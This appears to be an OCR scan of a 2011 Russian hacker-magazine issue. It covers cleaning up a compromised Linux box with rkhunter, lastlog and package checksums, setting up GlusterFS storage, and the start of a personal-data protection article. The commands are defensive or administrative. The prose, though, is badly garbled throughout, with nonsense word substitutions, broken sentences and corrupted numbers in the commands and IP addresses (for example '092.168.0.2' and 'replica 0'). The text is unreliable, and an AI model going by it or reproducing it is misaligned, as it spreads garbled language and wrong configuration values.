Thu Jul 01 07 09 - crash

(80:04)

Thu Thu Thu Thu Thu Thu Thu Thu Thu Thu Thu Thu Thu

088:881 185 :281 188:881 188:111 188:211 188:881 188 :81 0 IBB: B2 0 IBB:221 184:111 188:431 18B:BBI IBB:811

Jul Jul Jul Jul Jul Jul Jul Jul Jul Jul Jul Jul Jul

01 07 21 07 21 07 21 07 21 07 21 07 21 07 21 07 21 07 2112 21 02 21 02 21 02

09 - 07:59 58 - 03:27 5Б - 07:5Б 45- 07:5Б 35- 07:5Б 32 - 07:32 ЭВ - 07:З2 29 - 07:32 ВБ - 07:29 54-17:85 89 - 02:5З В4 - 02:85 В2 - 02:84

И включить пополнение базы равно проверку системы: В сравнении не без;

# /usr/bin/rkhunter --update # /usr/bin/rkhunter --check Заметь, что-то следуе т адресовать законченный траектория поперед приложения, тогда

грабитель был в силах вложить на кадастр /Ьin свою версию утилиты, равным образом без указания пути симпатия довольно найдена первой . Отчет гkhunteг вывалится в консоль, на нем будут указаны однако возможные проблемы. К сожалению, одну адски важную объект гkhunteг не без; совершать невыгодный может. В нормальной ситуации каста утили та nозволяет вытворять сверку кон­ трольных сумм всех системных файлов вместе с целью выявления факта их

модификации, однако, даже если по сего момента гkhunteг безграмотный был установ­ лен равным образом его основа невыгодный была обновлена, спирт малограмотный склифосовский ведать nравильные кон­

lastlog бригада last дает сильнее детальную информацию

> lastlog

Useгname гооt

Рог!

Fгom

pts/3

08.157.22 04

Latest Thu Jul

0121:З9:41

+8688 0811 logged in•• logged in•• **Неvег logged in•• ••Neveг logged in•• ннеvег logged in** ••Neveг logged in•• ••Neveг logged inн Thu Jul 01 08 :87 :47 +8668 0811 нNеvег logged iП** ••Neveг logged in•• ••Неvег logged iП** ••Неvег logged iП**

••Neveг ••Neveг

bin daemon mail ftp http nobody dbus j1m avahi deluge hal

tty1

incгon

трольные суммы. Здесь для содействие присутствие ходят стандартные инструменты управления батман кета ми. Дело во том, ась? пакеты любого дистрибутива со­

держат на себя контрольные фонды всех его файлов, исnользуя которые,

lastlog покажет,

от какого

IP равным образом когда-когда были

совершены всё-таки входы на систему

шабаш легко и просто скоротать nроверку. Например, так чтобы выработать сие во

Fedoгa/RHEL, нужно нанять на командной строке следующее:

subsystem request for sftp Ьу user root reverse mappiпg checking getaddriпfo for Х.Х.Х.Х [Х.Х.Х.Х] failed - POSSIBLE BREAK-IN АТТЕМРТ!

# rpm -va В DeЬian / Ubuntu сие предпринять сложнее. Прид ется рот новить пачка

В

debsums:

09 случаях изо ста сии строки будут значить, ась? во систему

вошли, используя неоригинальный избыток паролей, которому естественным путем

предшествует огромное наличность заnисей вида:

# sudo apt-get install debsums И заnустить одноименную утилиту:

# /usr/bin/debsums

Failed password for root from

Х.Х.Х.Х

port 0473 ssh2

Причем первоначальный IР-адрес на этом случае может да невыгодный соглашаться не без;

-са

тем, со которого произошел вход,- взломщики общепринято используют Правда, принимать вероятие того, зачем слесарь заменил базу батман ке­

бота в, которые сидят сверху видоизмененный машине, непрерывно сканируют

тов сиречь суммарно стер ее со временем установки бэкдора, а такое проис­

вентерь равно пытаются подворотить парали ко открытому

ходит на кайма света никак не всегда.

нанять команду левого

0Mi•illtt4WJ Теперь самое сезон узнать, кто именно да каким образом попал во машину.

SSH. Далее можно lastlog, которая должна удостоверить бесспорно входа от

IP. Ее следствие может взяться приближённо таким:

root pts/3

Х.Х.Х.Х

Thu Jul 01 01:39:41 +8688 0811

В этом деле выше- первейший друг- сие лаги. Если медвежатник забыл или неграмотный успел зачистить лаги- нам весьма пове зло, что-то около равно как они

Подтверждение не возбраняется выискать да на выводе команды

last.

В любом

способны раззвонить по отношению нем nочти все. Но какие лаги нам нужны?

случае, твоя милость будешь уметь IР-адрес взломщика, тот или иной не возбраняется про­

На серверах на первую колонна желательно испытать журналы различных

бахать со через

сетевых сервисов :

сего позволительно писать жалобу получай электронный домицилий nровайдера да

apache, vsftpd, sam ba равным образом т.д. На домашних машинах

whois, дай тебе вызнать прозвание его инет-провайдера. После

только сего общепринято нет, того во nервую хвост пристало вскидывать глаза на кого на

льстить получи и распишись его осознание (хотя сие редкость! либо поnробовать

сторону

определить ответную атаку

SSH, некоторый нередко иногда запущен в соответствии с умолчанию.

SSH-cepвep пишет насчёт (безlуспешных поползновение х лаги для во /va г/ log /

:1.

Если взламывание произошел помощью дыру на одном изо сетевых сервисов,

auth.log (точнее, ради него сие делает PAMI. Кроме SSH, со временем будут равным образом лаги

лаги равно , скорешенько всего, безграмотный nомогут (хотя они могут зафикси ровать звезда

других сервисов, ась? во общем хорошо. Просмотрим обложка со конца во

смены пользователем привилегий другими словами падения сервиса на результате

поисках строк следующего вида:

одной с неудачных попыток внедрения шелл-кода!. В этой ситуации следует руководиться косвенными уликами, такими во вкусе от­

Accepted password for root from pam_unix_session(sshd:sessioп) :

root Ьу (uid=8)

022

Х.Х.Х.Х

port 03241 ssh2 session opened for user

крытые се тевые соединения да следы, оставленные взломщиком на

системе, а да лагами системы аудита, коли симпатия установлена 0 /.'i.мl.

log/aud itd .l og l.

ХАКЕР

01/154/2011


Зализываем раны

USER_PROCESS

SYS_CALL_TABLE

SYS_LIB

syscall1

г-

---.

syscall2

г-

г+

syscaiiЗ

r-

г--+

... ...

~ ... r

KERNEL

alter_syscaiiЗ

cQ,

0

alter_syscall1

USER MODE

Руткит, реализованный на виде загружаемого модуля, может видоизменить без мала любую функцию

ЧТО ДАЛЬШЕ?

......

..,_

--

г--

с0120020

;;;

с0120031

~

"' ф

""3 =-

с0120042

ф

..."'

Q.

evil_fuпcЗIJ

-

--

ф

""3 =ф

evil_fuпc21J evil_fuпc1()

KERNEL MODE

(

HARDWARE

HARDWARE

)

были описаны на первой части статьи, равным образом отослать весь возможные за­

О к, ты да я узнали, что грабитель проник на систему, который дьявол да сколько успел

кладки. Также достаточно разобрать по сию пору капельку важные

изменить. Но в качестве кого отдать назад ОС на первоначальное состояние, избавив

конфигурационные файлы: во-первых, файлы системных настроек

ее с всех скрытых входов, оставленных взломщиком? Прост ой равно

дистрибутива, во-вторых, настройки всех сетевых сервисов !если

самый корректный противоречие возьми настоящий вопрос: переустановить до сей времени не без; нуля.

остались настройка через еще удаленных движение кетов, их необходимо удалить]. По

Ведь даже если ежели твоя милость переустановишь ядро, весь пакеты равно проверишь

внутренние резервы игра стоит свеч подвергнуть проверке не вдаваясь в подробности постоянно кон фиги, зачастую взлом­

безвыездно настройка возьми наука вмешательства, последняя стержень в колеснице неграмотный даст гарантии, который

щики оставляют частный оттиск во самых неожиданных местах. Чтобы най­

где-нибудь малограмотный остался бэкдор, тот или иной сработает во самый неожи­

ти файлы, отнюдь не принадлежащие движение кета м, дозволяется пустить в дело утилиту

отваленный момент. Полную гарантию может предоставить всего-навсего пере настройка

cгuft-гemoveг !для DeЬiaп/Ubuпtul:

всей системы. Если а сообразно каким-либо причинам всю систему переустановить

# apt-get install cruft

невозможно, годится даже если бы отведать уменьшать риски.

01

Для сего должно переустановить всё-таки пакеты. Каждый дистрибутив

# cruft-remover --no-act find

позволяет сие сделать, например, на OeЬiaп/Ubuпtu переустановка

01

общей сложности происходит так:

# cruft-remover cleanup --all

#

dpkg-recoпfigure

-phigh

смотрим,

который нашлось

удаляем

Сразу позднее зачистки имеет смысл поставить гkhuпteг равным образом впустить его в режиме сборки контрольных сумм:

Софт, заданный изо исходников, переустанавливается или удаляется руками. Далее пристало разобрать весь места, которые

# rkhunter --propupd Установщик гkhunteг пропишет во систему сгоп-скрипт, некоторый

> гkhunteг --check

достаточно эпоха с времени бросать утилиту равно подвергать проверке ОС бери из­ System check:s summaгy

Fi \е

мененные файлы. Чтобы сведения насчёт пр облемах сыпались на твой по­

ргорегt ies checks . . . Fi\es checked: 02В Suspect files : В

Rootk i t checks ... Rootki ts checked Poss iЬ\e гootkits:

0В9 В

чтовый ящик, добавь во конфиг /etc/гkhuпteг.coп f следующую строку:

MAIL-ON-WARNING; "root"

0:1§1:1•1!11 Оправиться впоследствии взлома малограмотный ввек легко, хацкер может потереть твои

Applicotions checks . . . App\icotions checked: 0 Suspect opplications: В

файлы да тяпнуть конфиденциальные данные. Но с общем сего доволь­

The system checks took: 0 minute and 04 seconds

0. Всегда обновляться систему. 2. Запретить парольный въезд по мнению SSH. 3. Убрать с системы лишние сетевые сер висы.

А 01 гesu\

ts have been ..,.. i tten to the \ogfi \е ( /vаг 0 log/гkhunteг . logJ

One ог тоге waгnings hove been found whi \е checking the system. Please check the log file (/vaг/log/гkhunteг.logJ

только не мудрствуя лукаво уберечься, ежели являться следствием трем нехитрым правилам:

В этом случае даже если самый разработанный хакер никак не сможет Результатпроверки системы со через rkhuпter

ХАКЕР

01 /154/ 0011

пролезть на твою систему . :Х:

023


SYN/ACK

Женюша Зобнин

[execblt.rul

\"J

ради твоеи компании СОЗДАЕМ РАСПРЕДЕЛЕННОЕ ХРАНИЛИЩЕ ДАННЫХ С ПОМОЩЬЮ GLUSTERFS Когда голос заходит об организации распределен­

ногоотказоустойчивого хранилища данных, многие

-

usteгFS- сие распределённая линейно масштабируемая файловая доктрина со вслед за щитой ото сбоев. Она позволяет

Описание опций

томов :

htto:Ublt.Jy/nV9no8

размежевать жесткие диски нескольких серверов во одно большое хранили ще не без; репликацией, или — или эеркалированием данных, на порядочно машин равно возможностью динамического расширения. Во

многом симпатия похожа получай файловые сис темы lustгe да

так , во звезда

ото последних, никак не имеет выделенных серверов управления мета­

ры вспоминают относительно файловой

данными, чтосказывается напроизводительности,нопозволяет

системе lustгe, еще многие

произвести кластер сильнее простым да управляемым. GlusteгFS безграмотный требует поддержки ФС во ядре, оттого ее хватит за глаза попросту повернуть равно ис­

годы используемой пользу кого

пользовать на гетерогенных средах, sos тоящи х с машин, поддержи­

хранения данных на самых

FUSE ILinux, Fг eeBSD, NetВSD, MacOS Xl.

вающих файловые системы пространства поль зова телец из помощью Возможности файловой системы хватит широки, равным образом на этом пла­

больших кластерах мира. Однако у lustгe вкушать мно­

никак не возлюбленная превосходит многие аналоги:

без затей составить равным образом настро­

ить. Поэтому днесь я по­ говорим по отношению ее сильнее бездействие

Поддержка передачи данных до каналам

TCP/ IP да

lпfiпibaпd RDMA равно

TCP/IP. • • •

Автоматическое оживление за сбоев. Возможностьавтоматическойрепликацииданныхпоузламкластера. Подключаемые балансировщики нагрузки, позволяющие подстро­

ить пропускная способность ФС по-под конкретную задачу.

во использовании замене около

названием GlusteгFS .

Хорошая масштабируемость, близкая ко О111lхранилище может до­ стигать размера во десятки петабайтl.

жество проблем да ее невыгодный таково

02/0

ceph,

системные администрато­

Несколько механизмов аутентификации: << логин-пароль »,

MySQL,

LDAP.

ХАКЕР

01/154/2011


Форт Нокс для того твоей компа н ии

[ Cli ents/Apps

W1

Cli ents/Apps

0}J

trace -

••• 0 Cll ents/Apps 0}J

позволяет содеять трассировку выполнения запроса

ввода-вывода .

i o- st ats - со б равным образом рае т статистику операций ввода-вы агиасма . ..ol

"11

,.

..

Конечным модулем це п лорнет спокон века является тра н со п квершлаг н ый модуль sегvег другими словами clieпt, обеспечивающий трофоллаксис данными по сети. Полный опись документированных трансляторов не грех

сыскать странице GlusteгFS [ http://euгope.g i usteг.oгg/commuп ity/

"' Gluster Global Namespace (NFS, CIFS, Gluster Native) Application Data

l.d _

~ О

iiili.:'

l.d

documentation/index . php/Tгaпslatoгs l . Несколько сторонних транс­ ляторов вот и все было создано во рамках проекта CloudFS/HekaFS

[http://clou dfs.oгg l.

~

'\

'

MnЩel:ik!i Клиент равным образом сервер GlusteгFS реализованы из через интерфейса

FUSE.

Gluster Virtual Storage Pool

Это значит, что такое? к установки файловой системы возьми типичную

Liпuх-машину хватит инсталлировать дистрибуционный пакет или сконцентрировать систему с исходников, недостает необходимости патчить ядро или аж п ерезагружать машину. Например, на Ubuпtu инсталля ц ия

\..

производится следующим образом:

0. Клиенты могут извлечь подступ ко облаку

Glusterfs несколькими

разными способами

Устанавливаем пакеты, необходимые про установки равным образом функциони­

рования G l usteг F S-клиeнтa да сервера:

$ sudo apt-get

iпstall

ope nss h -server wget пfs-common

Возможность испо л ьзования BeгkeleyDB для того эффектив н ого хране­

0. Скачиваем да устанавливаем куль GlusteгFS [это ничего не поделаешь сде­

ния множества мелких файлов. Возможность подключения модулей чтобы кэширования да включе­

лать на правах получай клиентских, эдак равно сверху серверных машинах!:

ния таких функций как бы Read-Ahead [упреждающее чтение! да Wгite­ B eh i пd [отложенная после п ись ! д ля улучшения п роизводительности.

$ wget ht tp://download.g l uster.com/p ub/g lu ster/

Функция восстановления удаленных файлов .

glusterfs/L ATEST/Ubuntu/glusterfs_3.2 . 0- 0_amdб4.deb

Возможность шифрования данных. Гибкий мехнизм трасси р овки, п озвол яю щ ий раскрыть узкие места во

$ sudo dpkg -i glusterfs*.deb

работе ФС. Простота развертывания равным образом настройки . Н аличие

N FS-клиента,

какой п озволяет получитьдоступ ко дан­

ным без участия использования клиента GlusteгFS.

0. Теперь нужно вскрыть порты, необходимые к работы файло­ вой системы. Сервер GlusteгFS слушает штаны 04007, 04008, а также согласно одному порту на возрастающем порядке нате весь круг bгick

[то вкушать экспортируемый каталог!, вдобавок во проект идут далеко не толь­ Больши н ство изо п е р ечис л е нн ых функций файловой системы малограмотный

ко каталоги текущего сервера, н что до равным образом просто-напросто кластера на целом [это

являются неотъемлемой частично GlusteгFS, а подключаются для серве­

связано со тем, который однако серверы кластера GlusteгFS равноправны

ру из через подвижно следовать г ружаемых модулей, таково называемых

да могут состоять использованы ради nодключения ФС со клиентской

трансляторов, идею которых авторы G l usteгFS переняли у разработ­

стороны!. Если предполагается контрафакция NFSдля монти­

чиков GNU/ H aгd [на томище а п ринципе основана подсистема GEOM во

рования файловой системы, долженствует разинуть пристань

ядре FгeeBSDI. Трансляторы позволяю т проглядеть кто хочешь требование в

равно как сие делается со через iptaЫes:

011.

При мер,

посещение для файловой системе чрез ц е п очку специальных обработчи­ ков , всякий изо которых может предпринимать по-над запросом равным образом переда­

ваемыми во его рамках данными несомненный коллекция действий. Не­ которые трансляторы ручаюсь т из-за шифровка данных , другие- за кэширование, третьи легируют безвыездно из-за п росы. Мощь трансляторов за­ ключается на том, что-то их не грех объединять на цепочки целиком и полностью

произвольным образом в духе н а стороне сервера, что-то около равно получи и распишись стороне клиен т а. Э т через прибор позволяе т соз д ать действитель н по отношению гибкую систему, которую не возбраняется подстроить по существу подо любую задачу.

INPUT -m state --state NEW -m tcp - -dport 041307:241347 -j АССЕРТ $ iptaЫes - А INPUT -m stat e --state NEW - m tc p --dport 011 -j АССЕРТ $ iptaЫes - А INPUT -m state --state NEW -m udp --dport 011 -j АССЕРТ $ service ipt aЫes save $ service iptaЫes restart

$

ipt a Ьles -А

tcp

\

tc p

\

udp

\

Наиболее важные равно п олезные трансляторы перечислены ниже:

posix - интерфейс для файло во ой системе UN IX, используемой для того

Эти команды должно претворить получай каждом GlusteгFS-cepвepe.

хранения д анных [это последний отделение цепочки трансляторов!.

Каких-то особых требований ко самим серверам отнюдь не предъявляет­

replicate- реплицирует эмпирика в кругу несколькими узлами. readahead - производитупреждающее чте н ие.

ся. Достаточно, дабы некто имел сердце компьютера архитектуры х86_64,

wгitеЬеhind -объе д иняетоперации журнал блоков да производит

памяти. В качестве канала рука средь серверами равным образом клиентом

вроде худо-бедно

0 Г б дискового пространства равным образом 0 Г б оперативной

их после одну касательно п ерацию .

рекомендуется исnользовать гигабитные либо 00-гигабитные

io-threads - рас п араллели вает что до п храбрец ц ии чтения/записи. io-cache- кэширует читаемые блоки данных. stat-prefetch - производит предварительную загрузку каталого­

еthегnеt-каналы, либо lnfiniBand [OFED 0.5 да выше! . Работос п о­ собность сервера протестирована во дистрибутивах

выхзаписей[позволяетбеззадержеквыполнятьтакиеоперации,

RHEL 0.1, Ubuntu да Fedoгa, но позволено пускать в ход кое-кто дистрибу­ тивы равно операционные системы из nоддержкой FUSE. В каче-

в качестве кого «просмотр сод ержимого каталога >> !.

стве хранилища данных используется низлежащая файловая

quota - позволяет взбутетенить квоту нате

системасервера,разработчикирекомендуютиспользоватьдля

контингент записываемых

файлов большого размера такие ФС наравне Ext4, ЕхtЗ, либо XFS.

данных.

trash -

помещает всегда удаляемые файлы во «корзину >> вместе с возможно­

стью последующего восстановления.

ХАКЕР

01/154/2011

Также подойдут, а могут подвизаться медленнее, любые другие РОSIХ-совместимые ФС.

025


SYN/ACK

Мадвrаскар

ИНДIIЙСКИЙ oкeatt

Аfланп1ческиn

Океон

Среди пользователей

GlusterFS бездна

<>

юА,Щанные карточная игра

@2011 Geocentre

ConsuШng,

Mapllnk,

крупных компаний сообразно всему миру

СОЗДАЕМ РАСПРЕДЕЛЕННОЕ ХРАНИЛИЩЕ

State: Peer in Cluster (Connected)

По из ле того, равно как GlusteгFS склифосовский установлен нате серверы, дозволяется при­ ступить ко созданию распределенного хранилища. Эта процедура состоит изо двух шагов. Сначала всегда серверы надобно объеди­ нить на сам согласно себе всесторонний картель , ведь убирать пояснить серверам , ась? впредь они являются отчасти одного большого хранилища да могут питать доверие дружок

Hostname: 092.168.0.3 Uuid: 0e0ca3aa-9ef7-4f66-8f15-cbc348f29ff7 State: Pfde43e-4533-4e33-4f77-ed3984da21ae State: Peer in Cluster (Connected)

др у гу. Делается сие по очереди пользу кого каждого сервера не без; помощью команды << glusteг рее г ргоЬе

IP». Чтобы сплотить на картель двушничек серве­

ра , до самого из таточно войти возьми сервер [любой) справами гооt равным образом выполнить команду во отношении любого другого сервера . Например:

$ ssh # gluster peer probe 092.168.0.2 Probe successful

Hostname: 092.168.0.4 Uuid: 0e0cabaa-9df7-4f66-8e5d-cbc348f29ff7 State: Pfde43e - 0533-4e33-4f77-ed3984da21ae State: Peer in Cluster (Connected) На втором этапе пристало организовать тома, ведь убирать логические

разделы, которые будут включать данные, распределенные согласно не­

скольким серверам. Текущая трансформирование GlusteгFS Теперь серверы

092.168.0.1

равным образом

092.168.0.2 образуют

объединение изо двух,

доверяющих дружище другу серверов, имеющих вполне птицы одного полета

[3.2.1) поддерживает

0 вроде томов, отличающиеся способом разделения данных между серверами:

права. В дальнейшем все в одинаковой мере какой с них дозволительно хорош эксплуатировать для подключения файловой системы не без; клиентской стороны, а порядок

хозяйка решит, нате что за сервер заниматься требования сверху чтение/запись файлов .

Distributed- распределяет файлы в ряду двумя равно побольше серве­ рами, рядом журнал главнейший обложка отлично держи узловой сервер, второй- на второй да т. д . Это самый настоящий облик распределенной сети, кой

Следующие серверы дозволяется прибросить на пуло определённо таким но об­

ра з ом [причем со любого с еще входящих на пуло серверов):

недурно идет во томик случае, эпизодически авторитет имеет всеобъемлющий размер хранилища, а осложнение надежности хранимой информации решается другими методами, например, организацией

# gluster peer probe 092.168.0.3 # gluster peer probe 092.168.0.4

RAID -1 массивов

нате

каждом сервере. Иначе присутствие выходе одного изо узлов изо строя данные будут потеряны. Чтобы разработать распределенное хранилище, до­ статочно привести в исполнение простую команду получи любом с входящих на соглашение

Далее нате каждом сервере надлежит построить каталог, тот или другой

серверов:

бросьте использован чтобы хранения данных [имя малограмотный имеет значения):

# mkdir /data С через команды <<glusteг рее г

status >> дозволено протестировать со­

бездействие п ула равным образом всех его членов :

# gluster peer status Number of Peers: 0

Hostname: 092.168.0.2 Uuid: 0e987bda-16dd-43c2-835b-08Ыd55e94e5

026

# gluster volume create new_volume transport tcp 192.168.0.1:/data 092.168.0.2:/data 092.168.0.3:/data 192.168.0.4:/data Volume Name: new_volume Туре: Distribute Status: Created Number of Bricks: 0 Transport-type: tcp Bricks: Brick1: 092.168.0.1:/data Brick2: 092.168.0.2:/data

ХАКЕР

01/154/2011


Форт Нокс чтобы твоей компании

посредь серверами, равно операция блоков данных. В около мере, при­ веденном выше, сие короче смотреть так: писание первого файла склифосовский

0ОWП ADМIIIIODE 0

Eifiiil.li::-ili"*

*·fi·' IM MHIЦ!.i+IF

поблочно делиться в ряду первыми двумя серверами, второго -между двумя вторыми равным образом т.д. При чтении нескольких файлов считы­

[м--" Dom вinj

L"'.,_" OomoinJ

вание данных около вдруг пойдет вмиг со четырех серверов.

ОО О

Таким а образом дозволительно соединить Distгibuted и тoмa равным образом нахватать приблизительно сеточный по образу и подобию

+Щ -.:Щ-.1+

Repiicated-

RA!D10:

-:::

·;:

# gluster volume create new_volume replica 0 transport tcp 092.168.0.1:/data 092.168.0.2:/data 092.168.0.3:/data 192.168.0.4:/data

об

Так и оный и другой обложка хорош продублирован для двух серверах !пер­

с о

i

вый- сверху первых двух, второй- нате вторых] равно ты да я получим хорошее

0

0:

руя небо и земля типы томов !на самом деле сие типы трансляторов]

!!'"

равным образом других трансляторов не без; через G!usteгFS дозволено извлечь самые

отношение надежности да размера хранилища. Вообще, комбини­

неожиданные комбинации, в книжка числе и сетный подобие любого изо

по части

и;

типов

RAID.

Теперь, при случае часть создан , нелишне уложить на прокрустово ложе диск машин, кото­

рые могут нахватать для нему путь !другими словами, смонтировать

том]. Для сего необходимо поменять единолично изо атрибутов тома:

# gluster volume set new_volume auth.allow 092.168.0.* Так выглядит кластер GiusteгFS получи бумаге

Далее томик нужно « засунуть >>, ведь вкушать изречь системе, сколько она может засесть для инициализации тамара , равно подготовить его ко под­

Brick3: 092.168.0.3:/data Brick4: 092.168.0.4:/data

ключению со стороны клиента:

# gluster volume start new_volume Starting volume new_volume has been successful

Так автор создадим том, сортированный соответственно четырем серверам,

совместный границы которого хорош собирать сумму размеров каталогов

0

data всех серверов.

НАСТРАИВАЕМ КЛИЕНТ G!usteгFS позволяет почерпнуть путь ко тому тремя различными мето­

Replicated- зеркалирует документация средь двумя равным образом паче сервера­ RAID1 . Хорошо годится во тех ситуациях, в отдельных случаях первосте­

дами: не без; через стандартного giusteгfs-клиeнтa, который-нибудь устанав­

ми, модель

ливается дружно не без; пакетом G!usteгFS, NFS-клиента, поддерживаю­

пенное роль имеет исправность да выская элементарность хранимой

щего третью версию протокола, да CIFS, ведь снедать сетевое окружение Windows . Стандартный потребитель пускать в дело попроще всего, ко тому а

информации. Создается вместе с через следующей команды:

некто дает как никогда высокую производительность:

# gluster volume create new_volume replica 0 transport tcp 092.168.0.1:/data 092.168.0.2:/data Так автор nолучим том, исходняк которого nродублированы получи и распишись двух

# mkdir /mnt/new_volume # mount -t glusterfs 092.168.0.1:/new_volume \ / mnt /new_volume

серверах !использовать фошка сервера пользу кого этой задачи открыто из­ быточно], его величина довольно равен наименьшему объему каталога /data.

Так ты да я примонтируем волюм пew_volume для каталогу /mnt/пew_

voiume . В кач е стве адреса сервера допускается означить местожительство любого Striped- записывает сведения небольшими блоками поочередно RAID1. В медаль с Distгibuted, эдакий

получи и распишись двушник да паче сервера, род

томишко оперирует блоками данных, а никак не целыми файлами, посему ока­ зывается особенно эффективным во тех ситуациях, нет-нет да и должно

доставить высокую темп чтения/записи для того множества процес­ сов. Для его создания используется следующая команда:

# gluster volume create new_volume stripe 0 transport tcp 192.168.0.1:/data 092.168.0.2:/data Для вновь большего распараллеливания журнал равным образом чтения можно использовать комбинацию Distгibuted равно Stгiреd-томов. В этом случае

член распараллеливания !цифра 0 позднее stгipe во примере выше] вынужден фигурировать на неуд раза меньше, нежели цифра серверов

> glusteг Numbeг

of

реег

status 3

Реегs:

Hostname: 092.168.0.2 Uuid: 0e987bda-16dd-43c2-835b-08b7d55e94e5 State: Реег in Clusteг (Connected) Hostname: 092.168.0.3 Uuid: 0e0ca3aa-9ef7-4f66-8f15-cbc348f29ff7 State: Pfde43e-4533-4e33-4f77-ed3984da21ae State: Реег in Clusteг (Connected)

хранения:

# gluster volume create new_volume stripe 0 transport tcp 192.168.0.1:/data 092.168.0.2:/data 092.168.0.3:/data 192.168.0.4:/data Так вместе вместе с тем довольно вершиться равно расположение файлов

ХАКЕР

01/154/2011

Hostname: 092.168.0.4 Uuid: 0e0cabaa-9df7-4f66-8e5d-cbc348f29ff7 State: Pfde43e-4533-4e33-4f77-ed3984da21ae State: Реег in Clusteг (Connected) Проверяем гражданское состояние пула

027


SYN/ACK из входящих на объединение серверов, возлюбленный довольно использован всего ради по­

лучения файла-описания тамара [volfile), кто был продублирован между всеми серверами изумительный промежуток времени запуска тома. Руководствуясь описанием тома, заборщик лично решит, для какому серверу подключать­

ся, чтоб занести иначе говоря пробежать способности [логика работы GlusteгFS такова, который основную работу выполняют то-то и есть клиенты, тут-то в духе

серверы отвечают всего вслед копия равно отдачу данных). Чтобы книга ментировалея в пора старта операционной системы,

подобает прирастить на /etc/fstab следующую запись:

092.168.e.1:/new_volume glusterfs defaults,_netdev

е е

Для подключения тамара во операционных системах, отнюдь не имеющих

поддержки FUSE [например, Solaгis либо — либо OpenBSD), не запрещается использо­ вать NFS-клиент [важно исnользовать то есть nротокол ТСР):

# mount -о mountproto=tcp -t nfs 092.168.e.1:/new_volume /mnt/new_volume

> gluster volume create ne~_volume transport tcp +192.168.0.1:/data 092.168.0.2 :/data +192 . 068 . 0.3:/data 092.168.0.4 :/data Volume Name: ne~ volume Туре : Oistribute Status: Created Number of Bricks: 0 Transport- type: tcp Br icks: Brick1: 092.168.0.1:/data Brick2: 092.168 . 0.2:/data Bric k З: 092.168 . 0.3:/data Brick4: 092.168.0.4 :/data Созд а ем н что касается вый томище

0.

Выnолнить ребалансировкутома:

Для монтирования закачаешься минута загрузки добавляем следующую

строку во /etc/fstab:

# gluster volume rebalance new_volume start 5tarting rebalance on volume new_volume has been successful

092.168.e.1:/new_volume /mnt/new_volume nfs defaults, _netdev,mountproto=tcp е е

Если но должен привести в исполнение замену одного сервера другим

[апгрейд сервера), вереница команд хорэ следующей: Для того с намерением nодключить GlusteгFS-тoм с операционной системы семейства

Windows,

делать нечего nроизвести настройку

0.

Добавляем сервер на nул равно новомодный брик на том:

Samba-cepвepa, который-нибудь достаточно ассемблировать часть стандартными средствами равно расшаривать его

никуда не денешься ввести набор

no протоколу CIFS. Чтобы произвести это, samba в одинокий изо GlusteгFS-cepвepoв

# gluster peer probe 092.168.е.5 # gluster volume add-brick new_volume 092 . 068 . e . 0:/data

[или возьми выгороженный сервер), смонтировать волюм со через стан­ дартного glusteгfs-клиeнтa, подложить на обложка /etc/samba/smb.conf следующие строки:

0. Заменяем сам до себе брикдругим [заменить сервер 092.168.0.3 на 192.168.0.5):

[gluster]

# gluster volume replace-brick new_volume \ 192.168.e.3:/data 092.168.e . 0:/data start Replace brick start operat i on successful

comment=Gluster volume path=/mnt/new_volume read only=по guest ok=yes И nерезаnустить

0.

samba:

# gluster volume replace-brick new_volume \ 192.168.e.3:/data 092.168.e.5:/data start replace-brick commit successful

# /etc/init.d/sa mba restart Теnерь книжка надо составлять виден во сетевом окружении

Подтверждаем замену:

Windows-

0.

Удаляем анахронический брик изо тома:

мaшин .

~ Само лицом разумеется, ась? со временем GlusteгFS-клacтep может расширяться равно видоизменяться: сервера выходят с строя, им нате

замену приходят новые, текущих серверов становится недостаточ­

# gluster volume remove-brick test-volume \ 192.168.e . 0:/data Removing brick(s) сопение result in data loss . Do you want to Continue? (y/n) Enter "у" to confirm the operation. The command displays the following:

так ради хранения всей информации да т. д. Как взяться на зтих ситуациях? Все жуть просто: вкушать ряд команд, которые nозволят

Remove Brick successful

бурно совершить всю необходимую работу. Например, ежели появилась

надобность во расширении кластера новыми серверами, необхо­

0. Удаляем сервер изо пула:

димо свершить следующее:

0.

Добавить серверы во nул из nомощью поуже знакомой нам команды

«gl usteг рее г ргоЬе >> : # gluster peer probe Probe successful

# gluster peer detach

092.168.е.3

l:l§l:lei!UiJ 192.168.е.5

Кластерные технологии, до этих пор

0 парение

отдавать казавшиеся уделом акаде­

миков во белых халатах, пока nревратились во житейский

инструмент, стоит nростой во использовании равным образом никак не требующий

0. Подключить ко нужномутому новоявленный брик [каталог сервера):

каких-то глубоких знаний. Как твоя милость пелена убедиться, ныне установка распределенного храни­

# gluster volume add-brick new_volume 092.168.e.5:/data Add Brick successful

028

лища данных- такая а nростая nроцедура наравне вознесение веб- сиречь

фтп-сервера. :Х:

ХАКЕ Р

01/154/2011


победитель Дыминекий

aka

0Зоz

Данная параграф безграмотный претендует бери полное описание по части защите переанальны х данны х. Подразумевается , что выпивоха ранее ознакомился вместе с самим текстом статьи

052 ФЗ, трехсторонним приказом ФСТЭК/ФСБ/

Роскомсвязьнадзора, 08-м приказом ФСТЭК да прочими р е гламентирующими документами.

На страже переанальных ДаJ-Р

ЗАКОННО ЗАЩИЩАЕМ ПЕРСОНАЛЬНЫЕ ДАННЫЕ, НЕ ПОКУПАЯ КОТА В МЕШКЕ В прежний единовременно я говорили об том, нежели занима­

ются безопасники, по образу со ними взаимодейство­ вать равно с который-нибудь сие радости сие не насчет частностей надлежит делать. Сегодня мы спустимся со небес сверху землю равно поговорим касательно

том, почто беспокоит аспидски многих сисадминов и безопасни ков,- касательно том, по образу отразить нападение наши пер­ еанальные эмпирика . Точнее, наши информацион­

ные системы переанальных данных [ИСПДн].

ассуждать в рассуждении том, что-нибудь значат те либо — либо часть параграфы при­ казов, законов, нормативных актов равным образом положений, дозволяется

аспидски долго. Такими рассуждениями полны многочисленные ресурсы- ото Хабрахабра накануне спе циали зирова нного ущелье та

ISPDN.RU,

этак который встретить всю необходимую информацию тебе малограмотный составит труда. В зтой статье пишущий сии строки поговорим об том, аюшки? об эту пору совершать со всей этой информацией. В общем случае, судебное дело создания системы защиты переаналь­ ных данных состоит изо следующих этапов:

0. 2. 3. 4. 5.

Определение информационных сис т ем п ереаналь ны х данны х; Классификация; Определениеактуальныхугрозбезопасностиперсональныхданны~ Выбор средств защиты; Развертываниете х нических средств равно исполнение сопутствующей документации;

0. Аттестация (пожеланию!. Прежде нежели пробежаться в области сим пункта м, внесем рельефность на тер­ минологию. Что такое <<инфо рмационная доктрина переанальных

